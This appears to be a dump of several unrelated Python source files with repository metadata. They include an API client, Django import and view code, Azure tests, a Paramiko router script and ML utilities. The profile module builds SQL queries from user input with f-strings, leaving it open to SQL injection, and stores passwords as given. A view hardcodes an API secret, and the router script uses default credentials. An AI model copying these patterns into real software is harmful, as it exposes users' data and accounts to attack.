return self.update_arrays_with_http_info(array_settings, **kwargs)
else:
(data) = self.update_arrays_with_http_info(array_settings, **kwargs)
return data
def update_arrays_with_http_info(self, array_settings, **kwargs):
"""
Update arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_arrays_with_http_info(array_settings, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param PureArray array_settings: (required)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['array_settings']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_arrays" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'array_settings' is set
if ('array_settings' not in params) or (params['array_settings'] is None):
raise ValueError("Missing the required parameter `array_settings` when calling `update_arrays`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'array_settings' in params:
body_params = params['array_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| [
"[email protected]"
]
| |
f373e27e3ba576b9f7a22bbc7276a5e8c633bcb2 | e65ac1ea21eee50e7b5b5d5f8e0d8ceea2cb1c9a | /import/its-behind-you/import.py | 559133b57b5a5d8d7ca57d4823458c831c88daf3 | []
| no_license | dracos/Theatricalia | 539b42746dea86c0377db2593ba651e3563c1579 | 8cb417f5048a261329bc853bfcc6ba64c76daec8 | refs/heads/master | 2023-02-19T18:56:56.751263 | 2023-02-15T21:39:40 | 2023-02-15T22:13:42 | 1,178,517 | 5 | 2 | null | 2021-01-06T14:38:26 | 2010-12-17T23:02:50 | Python | UTF-8 | Python | false | false | 2,718 | py | #!/usr/bin/python
import os, sys, re, time
for i in range(3, 0, -1):
sys.path.append('../' * i)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from django.core.files.base import ContentFile
from plays.models import Play
from productions.models import Production, Part, ProductionCompany
from productions.models import Place as ProductionPlace
from people.models import Person
from photos.models import Photo
from functions import *
from plays2009 import *
real_run()
for venue in theatres:
if "," in venue:
name, town = venue.rsplit(',', 1)
location = add_theatre(name, town)
else:
location = add_theatre(venue)
theatres[venue] = location
for production in plays:
title = production['title']
log("Production of %s" % title)
play = add_play(title, force_insert=True)
company = None
producer = production['producer']
if producer:
if dry_run():
company = ProductionCompany(name=producer)
else:
company, created = ProductionCompany.objects.get_or_create(name=producer)
description = production['description']
source = '<a href="%s">its-behind-you.com</a>' % production['source']
production_obj = Production(
play = play,
company = company,
description = description,
source = source,
)
if not dry_run():
production_obj.save()
if production['titleImg']:
add_photo(production['titleImg'], production_obj, 'Title')
for p in production['pictures']:
add_photo(p, production_obj, 'Handbill')
dates = production['dates']
for d in dates:
start_date, end_date = d[0]
place = d[1]
location = theatres[place]
log(' %s %s %s' % (start_date, end_date, location))
if not dry_run():
ProductionPlace.objects.get_or_create(production=production_obj, place=location, start_date=start_date, end_date=end_date)
cast = production['cast']
for name in cast:
m = re.match('(.*) (.*?)$', name)
if m:
first_name, last_name = m.group(1), m.group(2)
else:
first_name, last_name = u'', name
log(' Actor: ' + first_name + ' ' + last_name)
if not dry_run():
try:
person, created = Person.objects.get_or_create(first_name=first_name, last_name=last_name)
except:
person = Person(first_name=first_name, last_name=last_name)
person.save()
Part.objects.get_or_create(production=production_obj, person=person, cast=True)
if name in castLinks:
person.web = castLinks[name]
person.save()
| [
"[email protected]"
]
| |
7eaa3fc42b530ce553df3f478e57dfcb78907226 | 335efc133db52ce3dcbb114f6be1e2e5c308ab35 | /backend/myprofile.py | 677b25332bc919433660284ec8608f4900feeaf6 | []
| no_license | mrclauderandall/CS-Capstone-Project | 12c9987713bf398fee838b6a1025fafbf3a8885d | cc599ac7d836360bfb78c80e4bbfb893bca39c2f | refs/heads/master | 2023-06-29T13:16:56.207602 | 2021-08-09T02:51:34 | 2021-08-09T02:51:34 | 394,126,058 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | import psycopg2
from flask import jsonify
#
# Should we migrate these functions to user.py?
#
def myprofile(username, conn):
cur = conn.cursor()
cur.execute(
f"SELECT * FROM public.users WHERE email = '{username}'"
)
result = cur.fetchall()
conn.close()
return(jsonify(result))
def editprofile(email, first_name, last_name, password, username, conn):
cur = conn.cursor()
cur.execute(
f"UPDATE public.users SET first_name = '{first_name}', last_name = '{last_name}', password = '{password}', email = '{email}' WHERE email = '{username}'"
)
conn.commit()
conn.close()
return(jsonify(200))
def setDP(image_url, username, conn):
cur = conn.cursor()
cur.execute(
f"UPDATE public.users SET profile_pic = '{image_url}' WHERE email = '{username}'"
)
conn.commit()
conn.close()
return(jsonify(200))
def getDP(username, conn):
cur = conn.cursor()
cur.execute(
f"SELECT profile_pic FROM public.users WHERE email = '{username}'"
)
result = cur.fetchone()
conn.commit()
conn.close()
return (jsonify(result[0]))
def removeDP(username, conn):
cur = conn.cursor()
cur.execute(
f"UPDATE public.users SET profile_pic = NULL WHERE email = '{username}'"
)
conn.commit()
conn.close()
return(jsonify(200)) | [
"[email protected]"
]
| |
bb7d789c7df59f3ef3d4b7d31cc5b89a64bbb3c6 | 51cbd904e17e45f6adb5303c3532a6ff0519ab42 | /sdk/tables/azure-data-tables/tests/test_table_service_properties_cosmos.py | 139f3c1973a4a4d8f57e5f7f63813ae8c7bfbeef | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
]
| permissive | heaths/azure-sdk-for-python | 203e9a6052d7dff5b5f2346bced86b9406be3419 | 77feaf14471eba6642f5c7ae2f3f06981ff361d7 | refs/heads/master | 2022-07-26T06:46:57.067502 | 2021-04-15T21:35:26 | 2021-04-15T21:35:26 | 239,629,447 | 0 | 0 | MIT | 2020-02-10T22:46:20 | 2020-02-10T22:46:19 | null | UTF-8 | Python | false | false | 9,896 | py | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import time
import pytest
from devtools_testutils import AzureTestCase
from azure.core.exceptions import HttpResponseError
from azure.data.tables import (
TableServiceClient,
TableAnalyticsLogging,
Metrics,
RetentionPolicy,
CorsRule
)
from _shared.testcase import TableTestCase
from preparers import CosmosPreparer
# ------------------------------------------------------------------------------
class TableServicePropertiesTest(AzureTestCase, TableTestCase):
# --Helpers-----------------------------------------------------------------
def _assert_properties_default(self, prop):
assert prop is not None
self._assert_logging_equal(prop['analytics_logging'], TableAnalyticsLogging())
self._assert_metrics_equal(prop['hour_metrics'], Metrics())
self._assert_metrics_equal(prop['minute_metrics'], Metrics())
self._assert_cors_equal(prop['cors'], list())
def _assert_logging_equal(self, log1, log2):
if log1 is None or log2 is None:
assert log1 == log2
return
assert log1.version == log2.version
assert log1.read == log2.read
assert log1.write == log2.write
assert log1.delete == log2.delete
self._assert_retention_equal(log1.retention_policy, log2.retention_policy)
def _assert_delete_retention_policy_equal(self, policy1, policy2):
if policy1 is None or policy2 is None:
assert policy1 == policy2
return
assert policy1.enabled == policy2.enabled
assert policy1.days == policy2.days
def _assert_static_website_equal(self, prop1, prop2):
if prop1 is None or prop2 is None:
assert prop1 == prop2
return
assert prop1.enabled == prop2.enabled
assert prop1.index_document == prop2.index_document
assert prop1.error_document404_path == prop2.error_document404_path
def _assert_delete_retention_policy_not_equal(self, policy1, policy2):
if policy1 is None or policy2 is None:
assert policy1 != policy2
return
assert not (policy1.enabled == policy2.enabled and policy1.days == policy2.days)
def _assert_metrics_equal(self, metrics1, metrics2):
if metrics1 is None or metrics2 is None:
assert metrics1 == metrics2
return
assert metrics1.version == metrics2.version
assert metrics1.enabled == metrics2.enabled
assert metrics1.include_apis == metrics2.include_apis
self._assert_retention_equal(metrics1.retention_policy, metrics2.retention_policy)
def _assert_cors_equal(self, cors1, cors2):
if cors1 is None or cors2 is None:
assert cors1 == cors2
return
assert len(cors1) == len(cors2)
for i in range(0, len(cors1)):
rule1 = cors1[i]
rule2 = cors2[i]
assert len(rule1.allowed_origins) == len(rule2.allowed_origins)
assert len(rule1.allowed_methods) == len(rule2.allowed_methods)
assert rule1.max_age_in_seconds == rule2.max_age_in_seconds
assert len(rule1.exposed_headers) == len(rule2.exposed_headers)
assert len(rule1.allowed_headers) == len(rule2.allowed_headers)
def _assert_retention_equal(self, ret1, ret2):
assert ret1.enabled == ret2.enabled
assert ret1.days == ret2.days
# --Test cases per service ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_table_service_properties(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
# Act
resp = tsc.set_service_properties(
analytics_logging=TableAnalyticsLogging(),
hour_metrics=Metrics(),
minute_metrics=Metrics(),
cors=list())
# Assert
assert resp is None
self._assert_properties_default(tsc.get_service_properties())
if self.is_live:
sleep(SLEEP_DELAY)
# --Test cases per feature ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_logging(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
logging = TableAnalyticsLogging(read=True, write=True, delete=True, retention_policy=RetentionPolicy(enabled=True, days=5))
# Act
tsc.set_service_properties(analytics_logging=logging)
# Assert
received_props = tsc.get_service_properties()
self._assert_logging_equal(received_props['analytics_logging'], logging)
if self.is_live:
time.sleep(30)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_hour_metrics(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
hour_metrics = Metrics(enabled=True, include_apis=True, retention_policy=RetentionPolicy(enabled=True, days=5))
# Act
tsc.set_service_properties(hour_metrics=hour_metrics)
# Assert
received_props = tsc.get_service_properties()
self._assert_metrics_equal(received_props['hour_metrics'], hour_metrics)
if self.is_live:
sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_minute_metrics(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
minute_metrics = Metrics(enabled=True, include_apis=True,
retention_policy=RetentionPolicy(enabled=True, days=5))
# Act
tsc.set_service_properties(minute_metrics=minute_metrics)
# Assert
received_props = tsc.get_service_properties()
self._assert_metrics_equal(received_props['minute_metrics'], minute_metrics)
if self.is_live:
sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_cors(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
cors_rule1 = CorsRule(['www.xyz.com'], ['GET'])
allowed_origins = ['www.xyz.com', "www.ab.com", "www.bc.com"]
allowed_methods = ['GET', 'PUT']
max_age_in_seconds = 500
exposed_headers = ["x-ms-meta-data*", "x-ms-meta-source*", "x-ms-meta-abc", "x-ms-meta-bcd"]
allowed_headers = ["x-ms-meta-data*", "x-ms-meta-target*", "x-ms-meta-xyz", "x-ms-meta-foo"]
cors_rule2 = CorsRule(
allowed_origins,
allowed_methods,
max_age_in_seconds=max_age_in_seconds,
exposed_headers=exposed_headers,
allowed_headers=allowed_headers)
cors = [cors_rule1, cors_rule2]
# Act
tsc.set_service_properties(cors=cors)
# Assert
received_props = tsc.get_service_properties()
self._assert_cors_equal(received_props['cors'], cors)
if self.is_live:
sleep(SLEEP_DELAY)
# --Test cases for errors ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_too_many_cors_rules(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
tsc = TableServiceClient(self.account_url(tables_cosmos_account_name, "cosmos"), tables_primary_cosmos_account_key)
cors = []
for i in range(0, 6):
cors.append(CorsRule(['www.xyz.com'], ['GET']))
# Assert
pytest.raises(HttpResponseError,
tsc.set_service_properties, None, None, None, cors)
if self.is_live:
sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_retention_too_long(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
tsc = TableServiceClient(self.account_url(tables_cosmos_account_name, "cosmos"), tables_primary_cosmos_account_key)
minute_metrics = Metrics(enabled=True, include_apis=True,
retention_policy=RetentionPolicy(enabled=True, days=366))
# Assert
pytest.raises(HttpResponseError,
tsc.set_service_properties,
None, None, minute_metrics)
if self.is_live:
sleep(SLEEP_DELAY)
class TestTableUnitTest(TableTestCase):
def test_retention_no_days(self):
# Assert
pytest.raises(ValueError, RetentionPolicy, True, None)
| [
"[email protected]"
]
| |
61327de1c6f0afb604104a7376dc24faaed7a103 | 42c6e00741a37d02880f14d49fa6f7d2f484cd22 | /market_place/article/migrations/0001_initial.py | 198b81c5bc9d5b6665d8db75449a4c76974684d4 | [
"MIT"
]
| permissive | otherland8/market-place | 023d34f92809ff61a3ee3e60007c27597b10047f | ebf21a77cf9b3998e270ebd2d4422d7ce997e472 | refs/heads/master | 2021-01-17T12:47:51.847532 | 2016-07-08T20:20:31 | 2016-07-08T20:20:31 | 59,594,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,308 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-08 16:02
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('public', '0005_auto_20160708_1736'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserBid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('current_bid', models.DecimalField(decimal_places=2, default=0, max_digits=9)),
('maximum_bid', models.DecimalField(decimal_places=2, default=0, max_digits=9, null=True)),
('created_date', models.DateTimeField(auto_now=True)),
('last_bid_date', models.DateTimeField()),
('is_smart_bid', models.BooleanField(default=True)),
('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='public.Article')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
]
| |
15660f72a517e3b32ec05f1edde94a333241df3b | 1a41addd7ca9486b5392158984f0e5c14d92edff | /tests.py | 331c9c2324a88becd6a3d030e51f2608966da740 | [
"MIT"
]
| permissive | humin11/sixquant | 32e94c2d1035c87a5cad816dd1286613c54174cd | bf3614c34cdbd4373dcbfc0cb24f58a1d7957d47 | refs/heads/master | 2021-08-26T08:37:33.808255 | 2017-11-22T16:10:36 | 2017-11-22T16:10:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | # coding=utf-8
import os
import sys
import unittest
root = os.path.abspath(os.path.expanduser(__file__ + '/../tests'))
sys.path.append(root)
if __name__ == '__main__':
suite = unittest.TestSuite()
suite.addTest(unittest.defaultTestLoader.discover('tests'))
unittest.TextTestRunner().run(suite)
| [
"[email protected]"
]
| |
bc54e1b48cf35f7afe4085bcfc57748031ff30b5 | 8ac0beeda7da3f6059f47dbd71f90a375589b8eb | /Ubiquiti/EdgeRouter-Lite.py | 5c1e1a6a434fbfc723d8a192f78062264691d878 | []
| no_license | evgenyzorin/Paramiko | f98dbabdb0954c4e55ecd88604de6ba81d421e6c | 9deb3d6d0491717524117dfd2c1a9cb4c968d016 | refs/heads/main | 2023-09-02T16:43:13.279258 | 2021-11-11T08:34:49 | 2021-11-11T08:34:49 | 390,994,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,628 | py | from paramiko import SSHClient, AutoAddPolicy
from datetime import datetime
import re
start_time = datetime.now()
def send_show_command(
devices,
username,
password,
command,
max_bytes=60000,
delay=1,
):
client = SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(AutoAddPolicy())
info = {}
for device in devices:
print(f'\n---------- Connecting device {device} ----------\n')
client.connect(
hostname=device,
username=username,
password=password,
look_for_keys=False,
allow_agent=False,
)
stdin, stdout, sterr = client.exec_command(command)
output = stdout.readlines()
for line in output[3:]:
data = [i.strip() for i in line.split(' ') if i]
if re.search('[a-zA-Z]', data[0]):
interface = data[0]
info[interface] = {
'ip': [data[1]],
'state': data[2].split('/')[0],
'link': data[2].split('/')[1],
'description': data[3],
}
else:
info[interface]['ip'].append(data[0])
print(info)
if __name__ == '__main__':
devices = ['192.168.1.1', '192.168.1.2']
command = '/opt/vyatta/bin/vyatta-op-cmd-wrapper show interfaces'
send_show_command(devices, 'ubnt', 'ubnt', command)
run_time = datetime.now() - start_time
print(f'\n---------- Elapsed time: {run_time} ----------\n')
| [
"[email protected]"
]
| |
266486163cb2f2c144efffc3cfa02050697431de | d7de23e521d73096f173318423cf6b0e5d06c97f | /CMGTools/LEP3/python/kinfitters.py | 2721d051ec15e98ffabeebf5f9689b3c2383578a | []
| no_license | HemantAHK/CMG | 3cf6c047b193e463e3632aa728cd49067e9dde76 | 7bec46d27e491397c4e13a52b34cf414a692d867 | refs/heads/master | 2021-05-29T20:01:04.390627 | 2013-08-15T15:24:22 | 2013-08-15T15:24:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from CMGTools.RootTools.RootTools import *
from ROOT import gSystem
gSystem.Load("libCMGToolsLEP3")
from ROOT import FourJetEpKinFitter
from ROOT import FourJetEpMKinFitter
from ROOT import DiJetMKinFitter
| [
""
]
| |
c0b9fba0df580154ea29be2dc724cbe802318450 | b8120b9a99b1aab3fa423bc28173b10523084301 | /app/views.py | 3980e892431891877c72c44e2da6ae5298a24185 | []
| no_license | Trailblazerr1/iiita-hacks-musify | e0cc22a95b164399462750e5667b886090ca17bb | d7ab39622306e48e280fb350b9f416b64dc95f37 | refs/heads/master | 2020-12-25T14:38:34.028923 | 2016-09-12T11:28:49 | 2016-09-12T11:28:49 | 67,906,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,195 | py | """
Definition of views.
"""
from django.shortcuts import render
from django.http import HttpRequest
from django.template import RequestContext
from datetime import datetime
from app.forms import PostForm
from django.http import HttpResponseRedirect
from clarifai.client import ClarifaiApi
import requests
import json
import gensim
import os.path
BASE = os.path.dirname(os.path.abspath(__file__))
word_model = gensim.models.Word2Vec.load_word2vec_format(os.path.join(BASE, 'vectors.bin'),binary=True)
genres = ['abstract', 'accordion', 'afrikaans', 'afrobeat', 'ambient', 'andean', 'anime', 'axe', 'balearic', 'banda', 'bangla', 'barbershop', 'baroque', 'bassline', 'bebop', 'bemani', 'bhangra', 'bluegrass', 'blues', 'bolero', 'boogaloo', 'bounce', 'breakbeat', 'breaks', 'britpop', 'broadway', 'byzantine', 'cabaret', 'cajun', 'calypso', 'cantopop', 'capoeira', 'carnatic', 'ccm', 'cello', 'celtic', 'chanson', 'choral', 'choro', 'christmas', 'clarinet', 'classical', 'comedy', 'comic', 'commons', 'consort', 'corrosion', 'country', 'dancehall', 'demoscene', 'desi', 'didgeridoo', 'disco', 'dixieland', 'downtempo', 'drama', 'drone', 'dub', 'ebm', 'edm', 'electro', 'electronic', 'electronica', 'emo', 'environmental', 'eurovision', 'exotica', 'experimental', 'fado', 'fake', 'filmi', 'flamenco', 'folk', 'footwork', 'freestyle', 'funk', 'gabba', 'galego', 'gamelan', 'glitch', 'gospel', 'grime', 'grindcore', 'grunge', 'guidance', 'hardcore', 'harp', 'hawaiian', 'healing', 'hollywood', 'house', 'idol', 'industrial', 'jazz', 'jerk', 'judaica', 'juggalo', 'jungle', 'klezmer', 'latin', 'lds', 'lilith', 'liturgical', 'lounge', 'lowercase', 'maghreb', 'magyar', 'mallet', 'mambo', 'medieval', 'meditation', 'melancholia', 'merengue', 'metal', 'metalcore', 'minimal', 'mizrahi', 'monastic', 'morna', 'motivation', 'motown', 'neoclassical', 'nepali', 'neurofunk', 'ninja', 'noise', 'nursery', 'oi', 'opera', 'oratory', 'orchestral', 'outsider']
def home(request):
return render(request, 'app/home.html')
def Developers(request):
return render(request, 'app/Developers.html')
def playlist(request):
assert isinstance(request, HttpRequest)
if request.method == 'GET':
form = PostForm()
else:
form = PostForm(request.POST) # Bind data from request.POST into a PostForm
if form.is_valid():
imgURL = form.cleaned_data['content']
app_id = "DbZ4NzfrPL-K_CHHf4y4srnvBUSgMo4Dz9BIbeXt"
app_secret = "crjTy-8St_kiFkL0wZZCFyrcoWJyOdets8Fa1BNi"
clarifai_api = ClarifaiApi(app_id,app_secret)
tags = ''
embedLink = ''
try:
result = clarifai_api.tag_image_urls(imgURL)
except: #if url is invalid based on clarifai API call
tags = 'invalid url'
imgURL = ''
if tags!='invalid url':
tagList = result['results'][0]['result']['tag']['classes']
bestGenre = imgscore(tagList,genres)
r = requests.get('https://api.spotify.com/v1/search?q=%22'+bestGenre+'%22&type=playlist')
jsonStuff = r.json()
uri = jsonStuff['playlists']['items'][0]['uri']
embedLink = "https://embed.spotify.com/?uri="+uri
return render(
request,
'app/playlist.html',
{
'form': form,
'imgsrc': imgURL,
'debugText': tags,
'playlistURI': embedLink,
'year':datetime.now().year,
}
)
return render(
request,
'app/playlist.html',
{
'form': form,
'imgsrc': '',
'debugText': '',
'playlistURI': '',
'year':datetime.now().year,
}
)
def imgscore(words,genres):
l = 0.0
summ = []
for genre in genres:
for word in words:
try:
simScore = word_model.similarity(genre,word)
l += simScore
except:
pass
summ.append(l)
l = 0
return(genres[summ.index(max(summ))]) | [
"[email protected]"
]
| |
61496518c7782cbc99ab59bb0f240368c572137d | 6fda3d57556c381de407898710b02244561ffa4e | /load_datasets.py | c6bd1af889b12f860b070b4aeab2aaf412827bd7 | []
| no_license | pachecobeto95/Quality_POPEX | 46679f7319aff44675b3ec41be2a4551a611e3d4 | e98987c5ff8836723ef227c685dcd7d10363522b | refs/heads/master | 2023-03-31T04:11:29.868823 | 2021-04-03T19:17:35 | 2021-04-03T19:17:35 | 335,408,076 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,288 | py | import torch
import torchvision.transforms as transforms
from torchvision import datasets
from torch.utils.data import Dataset, DataLoader, random_split, SubsetRandomSampler
class LoadDataset():
def __init__(self, input_dim, batch_size_train, batch_size_test):
self.input_dim = input_dim
self.batch_size_train = batch_size_train
self.batch_size_test = batch_size_test
self.transformation_list = transforms.Compose([transforms.Resize(input_dim),
transforms.CenterCrop(input_dim),
transforms.ToTensor()])
def cifar_10(self):
# Load Cifar-10 dataset
root = "cifar_10"
trainset = datasets.CIFAR10(root=root, train=True, download=True,
transform=transforms.Compose(self.transformation_list))
trainLoader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size_train,
num_workers=2, shuffle=True, drop_last=True)
testset = datasets.CIFAR10(root=root, train=False, download=True,
transform=transforms.Compose(self.transformation_list))
testLoader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size_test, num_workers=2, shuffle=False)
return trainLoader, testLoader
def cifar_100(self):
# Load Cifar-100 dataset
root = "cifar_100"
trainset = datasets.CIFAR100(root=root, train=True, download=True,
transform=transforms.Compose(self.transformation_list))
trainLoader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size_train,
num_workers=2, shuffle=True, drop_last=True)
testset = datasets.CIFAR100(root=root, train=False, download=True,
transform=transforms.Compose(self.transformation_list))
testLoader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size_test, num_workers=2, shuffle=False)
return trainLoader, testLoader
def imageNet(self, root_path):
# Load ImageNet Dataset
test_dataset = datasets.ImageFolder(root = root_path, transform = self.transformation_list)
_, val_dataset = random_split(test_dataset, (0, 50000))
val_loader = DataLoader(dataset=val_dataset, shuffle=False, batch_size=self.batch_size_test)
return None, val_loader
def caltech(self, root_path, split_train=0.8):
dataset = datasets.ImageFolder(root = root_path, transform = self.transformation_list)
train_size = int(split_train*len(dataset))
test_size = len(dataset) - train_size
train_dataset, test_dataset = random_split(dataset, (train_size, test_size))
train_dataset, val_dataset = random_split(train_dataset, (int(split_train*len(train_dataset)), len(train_dataset) - int(split_train*len(train_dataset))))
train_loader = DataLoader(dataset=train_dataset, shuffle=True, batch_size=self.batch_size_train)
val_loader = DataLoader(dataset=val_dataset, shuffle=False, batch_size=self.batch_size_test)
test_loader = DataLoader(dataset=test_dataset, shuffle=False, batch_size=self.batch_size_test)
return train_loader, val_loader, test_loader | [
"[email protected]"
]
| |
07668772edfbe22ce75606f7b2dbddeeadeb083a | efcd8ea3f5419cd7d6eb7406875b7f727291492f | /IRIS/width_wise_l2/8w_l2.py | 46704866ad62a1cdd2b0e5d8b54f553a21f127d6 | [
"MIT"
]
| permissive | jrepifano/xai_is_fragile | 936612c2ecf7b020ab1a75719d18bff9bed564d2 | fd7e21355582543fa2d00bf9f48d3e12725c3fb6 | refs/heads/main | 2023-08-28T00:45:36.066073 | 2021-11-13T20:12:51 | 2021-11-13T20:12:51 | 346,057,518 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,542 | py | import os
import time
import torch
import numpy as np
from pyhessian import hessian
from sklearn.datasets import load_iris
from sklearn.metrics import accuracy_score
from scipy.stats import pearsonr, spearmanr
from sklearn.model_selection import LeaveOneOut
from sklearn.preprocessing import StandardScaler
os.environ["CUDA_DEVICE_ORDER"] = 'PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"] = '3'
# Random Seed - Negating the randomizing effect
np.random.seed(6)
# Seeds : 2, 5, 10, 13, 15, 20
# Random Seed for tensorflow
torch.manual_seed(14)
class Model(torch.nn.Module):
def __init__(self, n_feats, n_nodes, n_classes):
super(Model, self).__init__()
self.lin1 = torch.nn.Linear(n_feats, n_nodes)
self.lin_last = torch.nn.Linear(n_nodes, n_classes)
self.relu = torch.nn.SELU()
def forward(self, x):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x = torch.tensor(x, requires_grad=True, device=device, dtype=torch.float32)
x = self.relu(self.lin1(x))
x = self.lin_last(x)
return x
def bottleneck(self, x):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x = torch.tensor(x, requires_grad=True, device=device, dtype=torch.float32)
x = self.relu(self.lin1(x))
return x
def fit(self, x, y, no_epochs=1000):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(self.parameters(), lr=1e-3, weight_decay=0.005)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=100, verbose=False)
for epoch in range(no_epochs):
optimizer.zero_grad()
logits = self.forward(x)
loss = criterion(logits, y)
loss.backward()
optimizer.step()
scheduler.step(loss.item())
def score(self, x, y):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
logits = torch.nn.functional.softmax(self.forward(x), dim=1)
score = torch.sum(torch.argmax(logits, dim=1) == y)/len(x)
return score.cpu().numpy()
def get_indiv_loss(self, x, y):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss(reduction='none')
logits = self.forward(x)
loss = criterion(logits, y)
return [l.item() for l in loss] if len(loss) > 1 else loss.item()
class influence_wrapper:
def __init__(self, model, x_train, y_train, x_test=None, y_test=None):
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.model = model
self.device = 'cuda:0' if next(self.model.parameters()).is_cuda else 'cpu'
def get_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_train[self.pointer].reshape(1, -1))
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor([self.y_train[self.pointer]], device=self.device))
return loss
def get_train_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_train)
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor(self.y_train, device=self.device))
return loss
def get_test_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_test.reshape(1, -1))
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor(self.y_test, device=self.device))
return loss
def get_hessian(self, weights):
dim_1, dim_2 = weights.shape[0], weights.shape[1]
H_i = torch.zeros((dim_1, dim_2, dim_1, dim_2), device=self.device)
for i in range(len(self.x_train)):
self.pointer = i
